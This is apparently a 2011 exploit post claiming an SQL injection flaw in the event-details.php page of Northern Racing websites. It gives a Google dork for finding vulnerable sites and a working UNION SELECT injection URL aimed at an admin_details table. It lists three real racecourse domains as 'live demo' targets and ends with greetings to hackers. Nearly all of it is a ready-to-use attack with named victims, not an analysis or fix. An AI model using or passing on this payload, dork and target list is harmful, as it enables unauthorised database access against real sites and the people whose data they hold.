========================================================================== # Exploit Title: Northern Racing SQL Injection Vulnerability # Date: 18.10.2011 # Author: poach3r # Software Link: http://www.northernracing.co.uk/ # Tested on: Windows XP SP3 # Google Dork: intext:Northern Racing Ltd inurl:event-details.php?detailId= ========================================================================== # Vulnerable File : ==> event-details.php <== # Exploit : http://127.0.0.1/path/events/event-details.php?detailId=[SQL] http://127.0.0.1/path/events/event-details.php?detailId=-1/**/union/**/Select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/**/admin_details/* # Live Demo : http://www.chepstow-racecourse.co.uk/events/event-details.php?detailId=[SQL] http://www.fontwellpark.co.uk/events/event-details.php?detailId=[SQL] http://www.sedgefield-racecourse.co.uk/events/event-details.php?detailId=[SQL] ========================================================================== # GreetZ To : All IRANIAN HackerZ ./End